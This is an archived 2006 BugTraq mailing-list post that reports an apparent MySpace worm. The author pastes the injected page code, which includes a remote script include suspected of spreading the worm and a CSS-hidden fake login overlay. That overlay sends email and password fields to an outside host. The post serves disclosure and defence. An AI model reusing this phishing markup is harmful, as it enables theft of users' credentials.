BugTraq
Possible Myspace Worm Aug 27 2006 03:24AM
mjw cyberwart com
There appears to be a new myspace worm propagating on their pages. The worm

infects a user's profile page and then attempts to phish for usernames

(emails) and passwords. The page looks almost identical to a regular myspace

login and the url looks like a valid myspace page. However, the form

attempts to redirect to another site. The form is miscoded though and does

not execute correctly.

An example page is: www.myspace.com/netty567

The regular divs seem to be hidden by a "hidden" flag.

If you attempt to enter your password, you can see the paramaters in the get

url. Then the page errors out.

I'm unsure of the means of propagation, however it appears to be:

<script src="http://cache.static.userplane.com/presence/m/f.js"

language="javascript" type="text/javascript"></script>

<script language="javascript" type="text/javascript">

<!--

up_runPresence('VmLelmpv78asi20WVLBM89pps3b1UZF3J7oij/t/3We49qrCOQ+euxTD
2H+rqgkp');

//-->

</script>

You can easily pull the code from the src url. I haven't fully analyzed it

yet, but I assume that's how the worm is propagating.

Example of the form trying to grab the passwords:

table { visibility:hidden;}

div { visibility:hidden; }

div table { visibility:visible!important; }

.Main { visibility:visible!important; position:absolute; left:0px;

top:125px; width:100%; background-color:e5e5e5; }

.show { visibility:visible!important; }

</style>

<DIV id="tipDiv" class="Main"

style="display:block;width:100%;height:100%;" align="center">

<img src="http://x.myspace.com/images/spacer.gif" width="10000" height="1" />

<table align="center" class="show" width="800" style="border:2px

solid silver;" cellpadding="0" cellspacing="0">

<tr align="center" valign="top" bgcolor="FFFFFF">

<form action="http://..:24/saving.php" method="get" name="theForm"

id="theForm">

<td align="center"><p><span class="blacktext15">You Must Be

Logged-In to do That! </span><br><br>

<font size="2">MySpace is FREE, But You Must Be a Member to Use

That Feature</font></p>

<table align="center" class="show" width="100%" border="0"

cellspacing="0" cellpadding="0">

<tr valign="top">

<td width="70%">

<table class="show" width="300" border="0" align="center"

cellpadding="1" cellspacing="0">

<tr>

<td valign="top" bgcolor="003399">

<table class="show" width="100%" border="0" cellspacing="0"

cellpadding="5">

<tr>

<td valign="top" bgcolor="FFFFFF" align="center">

<strong><font color="003399">Member Login</font></strong><br>

<table class="show" width="100%" border="0"

cellspacing="0" cellpadding="3">

<tr>

<td width="28%" align="right">E-Mail:</td>

<td width="72%"><input type="text" name="email"

value="" size="20"></td>

</tr>

<tr>

<td align="right">Password:</td>

<td><input type="password" name="password" size="20"></td>

</tr>

<tr valign="top">

<td colspan="2" align="center">

<a class="redlink7"

href="http://viewmorepics.myspace.com/index.cfm?fuseaction=user.retrieve
password"><font

size="1">Forgot your password?</font></a><br>

<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>

<td width="142" height="30" valign="bottom" align="center">

<input type="checkbox" name="Remember"

value="Remember">Remember Me

</td>

<td width="40" valign="bottom">

<input type="image" name="Submit22"

src="http://viewmorepics.myspace.com/images/button_login_main.gif"

alt="Log In">

</td>

</tr>

</table>

</td>

</tr>

</table>

</td>

</tr>

</table>

</td>

</tr>

</table>

</td>

<td width="30%" valign="middle"> </td>

</tr>

</table>

--

Matthew Wollenweber

mjw (at) cyberwart (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus